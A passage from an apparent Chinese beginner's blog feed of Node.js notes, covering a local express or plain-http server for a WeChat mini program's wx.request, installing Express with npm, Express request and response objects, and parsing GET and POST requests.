src="https://img-blog.csdnimg.cn/20200321081223532.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center=30x30@[TOC]" alt="在这里插入图片描述"></p><hr><h3 id="fail-amp-complete"><a href="#fail-amp-complete" class="headerlink" title="fail&complete"></a>fail&complete</h3><p> The fail function: if the API call fails, the mini program calls this function and returns the error information.</p><p> The complete function: the callback run when the API call ends (it runs whether the call succeeded or failed).</p><p> The code from my success example can be used as is; on an error, the error information is printed.</p><hr><h3 id="url的node-js代码"><a href="#url的node-js代码" class="headerlink" title="url的node.js代码"></a>The node.js code for the url</h3><p> All that is left is the url endpoint code written in node.js.</p><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="comment">//upLoad.js</span></span><br><span 
class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>)</span><br><span class="line"><span class="keyword">var</span> app = <span class="title function_">express</span>()</span><br><span class="line"><span class="keyword">var</span> comments = [{</span><br><span class="line"> <span class="attr">id</span>: <span class="string">'1'</span>,</span><br><span class="line"> <span class="attr">behavior</span>: <span class="string">'起床'</span>,</span><br><span class="line"> <span class="attr">dateTime</span>: <span class="string">'7:00'</span></span><br><span class="line"> },</span><br><span class="line"> {</span><br><span class="line"> <span class="attr">id</span>: <span class="string">'2'</span>,</span><br><span class="line"> <span class="attr">behavior</span>: <span class="string">'学习'</span>,</span><br><span class="line"> <span class="attr">dateTime</span>: <span class="string">'7:30'</span></span><br><span class="line"> },</span><br><span class="line"> {</span><br><span class="line"> <span class="attr">id</span>: <span class="string">'3'</span>,</span><br><span class="line"> <span class="attr">behavior</span>: <span class="string">'吃饭'</span>,</span><br><span class="line"> <span class="attr">dateTime</span>: <span class="string">'9:00'</span></span><br><span class="line"> },</span><br><span class="line"> {</span><br><span class="line"> <span class="attr">id</span>: <span class="string">'4'</span>,</span><br><span class="line"> <span class="attr">behavior</span>: <span class="string">'午睡'</span>,</span><br><span class="line"> <span class="attr">dateTime</span>: <span class="string">'13:00'</span></span><br><span class="line"> }</span><br><span class="line">]</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">'/'</span>, <span class="keyword">function</span>(<span class="params">req, res</span>) {</span><br><span class="line"> res.<span 
class="title function_">json</span>(comments)</span><br><span class="line">})</span><br><span class="line"><span class="keyword">var</span> server = app.<span class="title function_">listen</span>(<span class="number">36631</span>, <span class="keyword">function</span>(<span class="params"></span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> host = server.<span class="title function_">address</span>().<span class="property">address</span></span><br><span class="line"> <span class="keyword">var</span> port = server.<span class="title function_">address</span>().<span class="property">port</span></span><br><span class="line"></span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"应用实例,访问地址为 http://%s:%s"</span>, host, port)</span><br><span class="line"></span><br><span class="line">})</span><br></pre></td></tr></table></figure><p>The upLoad.js code above uses the express framework. You can of course do without it, so here is the code without express as well:</p><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="keyword">const</span> http = <span class="built_in">require</span>(<span class="string">'http'</span>)</span><br><span class="line"><span class="keyword">const</span> url = <span class="built_in">require</span>(<span class="string">'url'</span>)</span><br><span class="line"><span class="keyword">var</span> comments = [{</span><br><span class="line"> <span class="attr">id</span>: <span class="string">'1'</span>,</span><br><span class="line"> <span class="attr">behavior</span>: <span class="string">'起床'</span>,</span><br><span class="line"> <span class="attr">dateTime</span>: <span class="string">'7:00'</span></span><br><span class="line"> },</span><br><span class="line"> {</span><br><span class="line"> <span class="attr">id</span>: <span class="string">'2'</span>,</span><br><span class="line"> <span class="attr">behavior</span>: <span class="string">'学习'</span>,</span><br><span class="line"> <span class="attr">dateTime</span>: <span class="string">'7:30'</span></span><br><span class="line"> },</span><br><span class="line"> {</span><br><span class="line"> <span class="attr">id</span>: <span class="string">'3'</span>,</span><br><span class="line"> <span class="attr">behavior</span>: <span class="string">'吃饭'</span>,</span><br><span class="line"> <span class="attr">dateTime</span>: <span class="string">'9:00'</span></span><br><span class="line"> },</span><br><span class="line"> {</span><br><span class="line"> <span class="attr">id</span>: <span class="string">'4'</span>,</span><br><span class="line"> <span class="attr">behavior</span>: <span class="string">'午睡'</span>,</span><br><span class="line"> <span class="attr">dateTime</span>: <span class="string">'13:00'</span></span><br><span 
class="line"> }</span><br><span class="line">]</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> jjson = <span class="title class_">JSON</span>.<span class="title function_">stringify</span>(comments)</span><br><span class="line">http.<span class="title function_">createServer</span>(<span class="keyword">function</span>(<span class="params">req, res</span>) {</span><br><span class="line"> res.<span class="title function_">setHeader</span>(<span class="string">'Content-Type'</span>, <span class="string">'text/palin; charset=utf-8'</span>);</span><br><span class="line"> <span class="keyword">var</span> pathname = url.<span class="title function_">parse</span>(req.<span class="property">url</span>).<span class="property">pathname</span></span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(pathname)</span><br><span class="line"> <span class="keyword">if</span> (pathname == <span class="string">'/'</span>) {</span><br><span class="line"> res.<span class="title function_">end</span>(jjson)</span><br><span class="line"> }</span><br><span class="line">}).<span class="title function_">listen</span>(<span class="number">36631</span>)</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"http://127.0.0.1:36631"</span>)</span><br></pre></td></tr></table></figure><p>如果不用框架的话可能会导致浏览器浏览时出现中文乱码,只要写入<code>res.setHeader('Content-Type', 'text/palin; charset=utf-8');</code>即可,要用<code>res.writeHead</code>需要和<code>res.end</code>组合,具体怎么用还是自行搜索吧,我也不太了解。<br>upLoad.js的代码我都设置了路由,不用路由的话把</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span 
class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">app.<span class="title function_">get</span>(<span class="string">'/'</span>, <span class="keyword">function</span>(<span class="params">req, res</span>) {</span><br><span class="line"> res.<span class="title function_">json</span>(comments)</span><br><span class="line">})</span><br><span class="line"><span class="keyword">var</span> server = app.<span class="title function_">listen</span>(<span class="number">36631</span>, <span class="keyword">function</span>(<span class="params"></span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> host = server.<span class="title function_">address</span>().<span class="property">address</span></span><br><span class="line"> <span class="keyword">var</span> port = server.<span class="title function_">address</span>().<span class="property">port</span></span><br><span class="line"></span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"应用实例,访问地址为 http://%s:%s"</span>, host, port)</span><br><span class="line"></span><br><span class="line">})</span><br></pre></td></tr></table></figure><p>with this one:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">app.<span class="title function_">listen</span>(<span class="number">36631</span>)</span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">'/'</span>,<span class="keyword">function</span>(<span class="params">req,res</span>) {</span><br><span class="line"> res.<span class="title 
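function_">json</span>(comments)</span><br><span class="line">})</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"http://127.0.0.1:36631"</span>)</span><br></pre></td></tr></table></figure><p>and that is all. I have not written a version that uses neither the Express framework nor routing.</p><hr><p>The code has just three parts. Putting upLoad.js in the project root is enough, and placing it in the same directory as the .wxml file also works. One interesting point: whether you put upLoad.js in the project root or in the directory with the .wxml file, once the mini program compiles successfully an upLoad.js is generated automatically in the directory where you did not put it, although the generated file is empty.<br>Open cmd in the upLoad.js directory and run it with node; the first run should be in the directory where you wrote upLoad.js. Once it is running, enter the address <code>http://127.0.0.1:36631</code> in a browser and you will see the “id”, “dateTime” and other data; after that, click Compile in the developer tools to see the result.<br><img src="https://img-blog.csdnimg.cn/20200321082735880.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h2 id="这就完事了"><a href="#这就完事了" class="headerlink" title="这就完事了~"></a>That's all~</h2><hr><p>A few extra notes:</p><ol><li>After the developer tools compile successfully there will be two upLoad.js files, but when you run upLoad.js with node you still have to run it from the directory of the upLoad.js that has content, otherwise you get the situation below (in this post I use the name upLoad.js; the name I actually use is upLoadUrl.js)<br><img src="https://img-blog.csdnimg.cn/20200321083627116.jpg#pic_center" alt="在这里插入图片描述"><br>Nothing appears after the run command is entered; normally it should look like this<br><img src="https://img-blog.csdnimg.cn/20200321083803415.jpg#pic_center" alt="在这里插入图片描述"><br>Then take this address to the browser and it opens.</li><li>I also debug locally, using Charles to map the https domain to the local endpoint. For how to use it, look on the CSDN blog of “一个人也很酷” for a post titled 《微信小程序 本地开发》. I only started blogging recently and do not know whether linking to someone else's post would be illegal..., so I wrote it this way, haha. What I want to say is that Charles stops automatically after a while when it is not used, and then compiling in the developer tools fails<br> <img src="https://img-blog.csdnimg.cn/20200321085449791.jpg#pic_center" alt="在这里插入图片描述"><br>Starting Charles again fixes it. For local debugging, the endpoint address written in url should be the domain bound to your mini program, the same as at the beginning of the article.</li></ol><hr><p> That is roughly enough. If anything is wrong, please point it out and I will fix it promptly. Discussion in the comments is welcome too; I am a beginner as well, and we can improve together ↖(^ω^)↗<br> (I am a novice, so this is only a brief look at how wx:request is used. I wrote this post from many articles by others plus my own understanding, so please forgive the rough writing.)</p><hr><p> I will update my earlier posts later</p><hr>]]></content>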
<summary type="html"><h2 id="简析wx-request"><a href="#简析wx-request" class="headerlink" title="简析wx.request"></a>A brief look at wx.request</h2><h3 id="url"><a href="#url" class</summary>
<category term="WeChat Applet" scheme="http://example.com/categories/WeChat-Applet/"/>
<category term="solution" scheme="http://example.com/tags/solution/"/>
<category term="nodejs" scheme="http://example.com/tags/nodejs/"/>
</entry>
<entry>
<title>Installing the Express Framework</title>
<link href="http://example.com/2020/03/19/Node.js%E4%B8%AA%E4%BA%BA%E7%90%86%E8%A7%A3%E2%80%94%E2%80%94Express%E5%AE%89%E8%A3%85%E6%A1%86%E6%9E%B6/"/>
<id>http://example.com/2020/03/19/Node.js%E4%B8%AA%E4%BA%BA%E7%90%86%E8%A7%A3%E2%80%94%E2%80%94Express%E5%AE%89%E8%A3%85%E6%A1%86%E6%9E%B6/</id>
<published>2020-03-19T10:37:27.000Z</published>
<updated>2022-03-18T06:03:46.014Z</updated>
<content type="html"><![CDATA[<h2 id="Express-简介"><a href="#Express-简介" class="headerlink" title="Express 简介"></a>Introduction to Express</h2><p>Core features of the Express framework:</p><ul><li>Middleware can be set up to respond to HTTP requests.</li><li>A routing table is defined to perform different HTTP request actions.</li><li>HTML pages can be rendered dynamically by passing parameters to templates.</li></ul><hr><h2 id="安装-Express"><a href="#安装-Express" class="headerlink" title="安装 Express"></a>Installing Express</h2><p>Install Express and save it to the dependency list:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ cnpm install express --save</span><br></pre></td></tr></table></figure><p>or</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ npm install express --save</span><br></pre></td></tr></table></figure><p> The commands above install the Express framework into the node_modules directory of the current directory, and an express directory is created automatically under node_modules. The following important modules need to be installed together with the express framework:</p><ul><li>body-parser - Node.js middleware for handling JSON, Raw, Text and URL-encoded data.</li><li>cookie-parser - a tool for parsing cookies. The cookies sent with the request are available through req.cookies, converted into an object.</li><li>multer - Node.js middleware for handling form data with enctype="multipart/form-data" (which sets the form's MIME encoding).</li></ul><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ cnpm install body-parser --save</span><br><span class="line">$ cnpm install cookie-parser --save</span><br><span class="line">$ cnpm install multer --save</span><br></pre></td></tr></table></figure><p>or</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ npm install body-parser --save</span><br><span class="line">$ npm install cookie-parser --save</span><br><span class="line">$ npm install multer 
--save </span><br></pre></td></tr></table></figure><p>After installation, we can check the version of express in use:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ cnpm list express</span><br><span class="line">/data/www/node</span><br><span class="line">└── express@<span class="number">4.15</span><span class="number">.2</span> -> <span class="regexp">/Users/</span>tianqixin/www/node/node_modules/<span class="number">.4</span><span class="number">.15</span><span class="number">.2</span>@express</span><br></pre></td></tr></table></figure><p>On Windows, drop the "$" yourself; everyone should know this...</p><hr><p>Everyone knows npm downloads are slow; you can switch to the Taobao mirror registry:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">npm config set registry <span class="attr">https</span>:<span class="comment">//registry.npm.taobao.org </span></span><br></pre></td></tr></table></figure><p>– After configuring, you can verify that it worked as follows </p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">npm config get registry </span><br><span class="line">– or npm info express</span><br></pre></td></tr></table></figure><p>As an aside, for a more detailed tutorial on setting up the Node.js environment and installing Express, I recommend this <a href="https://zhuanlan.zhihu.com/p/77594251">Zhihu article</a></p><hr><h2 id="第一个-Express-框架实例"><a href="#第一个-Express-框架实例" class="headerlink" title="第一个 Express 框架实例"></a>A first Express example</h2><p>Next we use the Express framework to output "Hello World".<br>In the following example we import the express module and respond with the string "Hello World" once the client sends a request.<br>Create the file express_demo.js with the following code:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span 
class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// express_demo.js file</span></span><br><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>);</span><br><span class="line"><span class="keyword">var</span> app = <span class="title function_">express</span>();</span><br><span class="line"> </span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">'/'</span>, <span class="keyword">function</span> (<span class="params">req, res</span>) {</span><br><span class="line"> res.<span class="title function_">send</span>(<span class="string">'Hello World'</span>);</span><br><span class="line">})</span><br><span class="line"> </span><br><span class="line"><span class="keyword">var</span> server = app.<span class="title function_">listen</span>(<span class="number">8081</span>, <span class="keyword">function</span> (<span class="params"></span>) {</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">var</span> host = server.<span class="title function_">address</span>().<span class="property">address</span></span><br><span class="line"> <span class="keyword">var</span> port = server.<span class="title function_">address</span>().<span class="property">port</span></span><br><span class="line"> </span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"应用实例,访问地址为 http://%s:%s"</span>, host, port)</span><br><span class="line"> </span><br><span 
class="line">})</span><br></pre></td></tr></table></figure><p>Run the code above:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ node express_demo.<span class="property">js</span> </span><br><span class="line">应用实例,访问地址为 <span class="attr">http</span>:<span class="comment">//0.0.0.0:8081</span></span><br></pre></td></tr></table></figure><p>Visit <a href="http://127.0.0.1:8081">http://127.0.0.1:8081</a> in a browser; the result is shown in the figure below:<br><img src="https://img-blog.csdnimg.cn/20200319173423380.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p><h3 id="请求和响应"><a href="#请求和响应" class="headerlink" title="请求和响应"></a>Request and response</h3><p>(Copied and pasted from <a href="https://www.runoob.com/nodejs/nodejs-express-framework.html">菜鸟教程 (Runoob)</a>)<br>An Express application uses the parameters of the callback function, the <strong>request</strong> and <strong>response</strong> objects, to handle request and response data.</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">app.<span class="title function_">get</span>(<span class="string">'/'</span>, <span class="keyword">function</span> (<span class="params">req, res</span>) {</span><br><span class="line"> <span class="comment">// --</span></span><br><span class="line">})</span><br></pre></td></tr></table></figure><p>Details of the <strong>request</strong> and <strong>response</strong> objects:</p><p><strong>Request object</strong> - the request object represents the HTTP request and has properties for the query string, parameters, body, HTTP headers and so on. Common properties:</p><ol><li>req.app: when the callback is in an external file, use req.app to access the express instance</li><li>req.baseUrl: the URL path on which the router is currently mounted</li><li>req.body / req.cookies: the request body / cookies</li><li>req.fresh / req.stale: whether the request is still "fresh"</li><li>req.hostname / 
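req.ip: the host name and IP address</li><li>req.originalUrl: the original request URL</li><li>req.params: the route parameters</li><li>req.path: the request path</li><li>req.protocol: the protocol type</li><li>req.query: the URL query string parameters</li><li>req.route: the currently matched route</li><li>req.subdomains: the subdomains</li><li>req.accepts(): checks the acceptable document types of the request</li><li>req.acceptsCharsets / req.acceptsEncodings / req.acceptsLanguages: returns the first acceptable character encoding of the specified character sets</li><li>req.get(): gets the specified HTTP request header</li><li>req.is(): checks the MIME type of the request's Content-Type header</li></ol><p><strong>Response object</strong> - the response object represents the HTTP response, that is, the HTTP response data sent to the client when a request is received. Common properties:</p><ol><li>res.app: same as req.app</li><li>res.append(): appends the specified HTTP header</li><li>Calling res.set() after res.append() resets the previously set header</li><li>res.cookie(name,value [,option]): sets a cookie</li><li>option: domain / expires / httpOnly / maxAge / path / secure / signed</li><li>res.clearCookie(): clears a cookie</li><li>res.download(): sends the file at the specified path</li><li>res.get(): returns the specified HTTP header</li><li>res.json(): sends a JSON response</li><li>res.jsonp(): sends a JSONP response</li><li>res.location(): sets only the response's Location HTTP header, without setting a status code or closing the response</li><li>res.redirect(): sets the response's Location HTTP header and sets status code 302</li><li>res.render(view,[locals],callback): renders a view and passes the rendered string to callback; if an error occurs during rendering, next(err) is called automatically. callback receives a possible error and the rendered page, in which case the output is not sent automatically.</li><li>res.send(): sends the HTTP response</li><li>res.sendFile(path [,options] [,fn]): sends the file at the specified path; Content-Type is set automatically from the file extension</li><li>res.set(): sets an HTTP header; pass an object to set several headers at once</li><li>res.status(): sets the HTTP status code</li><li>res.type(): sets the MIME type of Content-Type</li></ol><hr><h2 id="路由"><a href="#路由" class="headerlink" title="路由"></a>Routing</h2><p>We have covered the basic use of HTTP requests; routing decides who (which script) responds to a client request.<br>In an HTTP request, routing lets us extract the requested URL and the GET/POST parameters.<br>Next we extend Hello World with some features for handling more types of HTTP requests.<br>Create the file express_demo2.js with the following code:<br><strong>Nothing here</strong><br>The rest of the original <a href="https://www.runoob.com/nodejs/nodejs-express-framework.html">菜鸟教程 (Runoob)</a> document is examples, which you can type in and verify yourself; this post is a set of notes, so I will not copy and paste more.<br>Of course, I will come back and update it once I understand the code more deeply.</p><p>This post is based on the <a href="https://www.runoob.com/nodejs/nodejs-express-framework.html">Node.js 菜鸟教程 (Runoob)</a>; for details see <a 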
href="https://www.runoob.com/nodejs/nodejs-express-framework.html">菜鸟教程 (Runoob)</a>.</p><hr><p>I will update my earlier posts later</p><hr>]]></content>
<summary type="html"><h2 id="Express-简介"><a href="#Express-简介" class="headerlink" title="Express 简介"></a>Introduction to Express</h2><p>Core features of the Express framework:</p>
<ul>
<li>可以设置中间件来响</summary>
<category term="Nodejs" scheme="http://example.com/categories/Nodejs/"/>
<category term="note" scheme="http://example.com/tags/note/"/>
</entry>
<entry>
<title>GET/POST Requests</title>
<link href="http://example.com/2020/03/19/Node.js%E4%B8%AA%E4%BA%BA%E7%90%86%E8%A7%A3%E2%80%94%E2%80%94GET_POST%E8%AF%B7%E6%B1%82/"/>
<id>http://example.com/2020/03/19/Node.js%E4%B8%AA%E4%BA%BA%E7%90%86%E8%A7%A3%E2%80%94%E2%80%94GET_POST%E8%AF%B7%E6%B1%82/</id>
<published>2020-03-19T10:37:12.000Z</published>
<updated>2022-03-18T06:03:46.015Z</updated>
<content type="html"><![CDATA[<p>Forms are generally submitted to the server with GET/POST requests.</p><h2 id="获取GET请求内容"><a href="#获取GET请求内容" class="headerlink" title="获取GET请求内容"></a>Getting the content of a GET request</h2><p>Because the parameters of a GET request are embedded directly in the path, and the URL is the complete request path including the part after the ?, you can parse that part manually as the parameters of the GET request.</p><ul><li>The parse function of the url module in Node.js provides this.</li></ul><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> http = <span class="built_in">require</span>(<span class="string">'http'</span>);</span><br><span class="line"><span class="keyword">var</span> url = <span class="built_in">require</span>(<span class="string">'url'</span>);</span><br><span class="line"><span class="keyword">var</span> util = <span class="built_in">require</span>(<span class="string">'util'</span>);</span><br><span class="line"> </span><br><span class="line">http.<span class="title function_">createServer</span>(<span class="keyword">function</span>(<span class="params">req, res</span>){</span><br><span class="line"> res.<span class="title function_">writeHead</span>(<span class="number">200</span>, {<span class="string">'Content-Type'</span>: <span class="string">'text/plain; charset=utf-8'</span>});</span><br><span class="line"> res.<span class="title function_">end</span>(util.<span class="title function_">inspect</span>(url.<span class="title function_">parse</span>(req.<span class="property">url</span>, <span class="literal">true</span>)));</span><br><span class="line">}).<span class="title function_">listen</span>(<span class="number">3000</span>);</span><br></pre></td></tr></table></figure><p>In a browser, visit <strong><a 
href="http://localhost:3000/user?name=%E8%8F%9C%E9%B8%9F%E6%95%99%E7%A8%8B&url=www.runoob.com">http://localhost:3000/user?name=菜鸟教程&url=www.runoob.com</a></strong> and look at the returned result:<br><img src="https://img-blog.csdnimg.cn/20200319165130303.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p><h2 id="获取-URL-的参数"><a href="#获取-URL-的参数" class="headerlink" title="获取 URL 的参数"></a>Getting the URL parameters</h2><p>We can use the url.parse method to parse the parameters in the URL, as follows:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> http = <span class="built_in">require</span>(<span class="string">'http'</span>);</span><br><span class="line"><span class="keyword">var</span> url = <span class="built_in">require</span>(<span class="string">'url'</span>);</span><br><span class="line"><span class="keyword">var</span> util = <span class="built_in">require</span>(<span class="string">'util'</span>);</span><br><span class="line"> </span><br><span class="line">http.<span class="title function_">createServer</span>(<span class="keyword">function</span>(<span class="params">req, res</span>){</span><br><span class="line"> res.<span class="title function_">writeHead</span>(<span class="number">200</span>, {<span class="string">'Content-Type'</span>: <span class="string">'text/plain'</span>});</span><br><span class="line"> </span><br><span class="line"> <span 
class="comment">// Parse the URL parameters</span></span><br><span class="line"> <span class="keyword">var</span> params = url.<span class="title function_">parse</span>(req.<span class="property">url</span>, <span class="literal">true</span>).<span class="property">query</span>;</span><br><span class="line"> res.<span class="title function_">write</span>(<span class="string">"网站名:"</span> + params.<span class="property">name</span>);</span><br><span class="line"> res.<span class="title function_">write</span>(<span class="string">"\n"</span>);</span><br><span class="line"> res.<span class="title function_">write</span>(<span class="string">"网站 URL:"</span> + params.<span class="property">url</span>);</span><br><span class="line"> res.<span class="title function_">end</span>();</span><br><span class="line"> </span><br><span class="line">}).<span class="title function_">listen</span>(<span class="number">3000</span>);</span><br></pre></td></tr></table></figure><p>In a browser, visit <strong><a href="http://localhost:3000/user?name=%E8%8F%9C%E9%B8%9F%E6%95%99%E7%A8%8B&url=www.runoob.com">http://localhost:3000/user?name=菜鸟教程&url=www.runoob.com</a></strong> and look at the returned result:<br><img src="https://img-blog.csdnimg.cn/2020031916531559.jpg" alt="在这里插入图片描述"><br>The second visit may show garbled text; rewriting the <code>res.writeHead</code> call in the second code block as <code>(200, {'Content-Type': 'text/plain; charset=utf-8'}); </code> fixes it. When garbled text appears you sometimes have no idea what you left out; fortunately it is not a big problem.<br>Note the value of <em>query</em> in the result of the first visit to <strong><a href="http://localhost:3000/user?name=%E8%8F%9C%E9%B8%9F%E6%95%99%E7%A8%8B&url=www.runoob.com">http://localhost:3000/user?name=菜鸟教程&url=www.runoob.com</a></strong>: when url.parse is used to parse the parameters in the URL, that is the object you get.</p><h2 id="获取-POST-请求内容"><a href="#获取-POST-请求内容" class="headerlink" title="获取 POST 请求内容"></a>Getting the content of a POST request</h2><p>All the content of a POST request is in the request body. http.ServerRequest has no property holding the request body, because waiting for and parsing the body takes time.</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Basic syntax structure</span></span><br><span class="line"><span class="keyword">var</span> http = <span class="built_in">require</span>(<span class="string">'http'</span>);</span><br><span class="line"><span class="keyword">var</span> querystring = <span class="built_in">require</span>(<span class="string">'querystring'</span>);</span><br><span class="line"><span class="keyword">var</span> util = <span class="built_in">require</span>(<span class="string">'util'</span>);</span><br><span class="line"> </span><br><span class="line">http.<span class="title function_">createServer</span>(<span class="keyword">function</span>(<span class="params">req, res</span>){</span><br><span class="line"> <span class="comment">// Define a post variable to temporarily hold the request body</span></span><br><span class="line"> <span class="keyword">var</span> post = <span class="string">''</span>; </span><br><span class="line"> </span><br><span class="line"> <span class="comment">// Via the data event listener on req, append each received chunk of the request body to post</span></span><br><span class="line"> req.<span class="title function_">on</span>(<span class="string">'data'</span>, <span class="keyword">function</span>(<span class="params">chunk</span>){ </span><br><span class="line"> post += chunk;</span><br><span class="line"> });</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// 
After the end event fires, parse post into the actual POST request format with querystring.parse, then return it to the client.</span></span><br><span class="line"> req.<span class="title function_">on</span>(<span class="string">'end'</span>, <span class="keyword">function</span>(<span class="params"></span>){ </span><br><span class="line"> post = querystring.<span class="title function_">parse</span>(post);</span><br><span class="line"> res.<span class="title function_">end</span>(util.<span class="title function_">inspect</span>(post));</span><br><span class="line"> });</span><br><span class="line">}).<span class="title function_">listen</span>(<span class="number">3000</span>);</span><br></pre></td></tr></table></figure><p>The following example submits a form via POST and outputs the data:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> http = <span class="built_in">require</span>(<span 
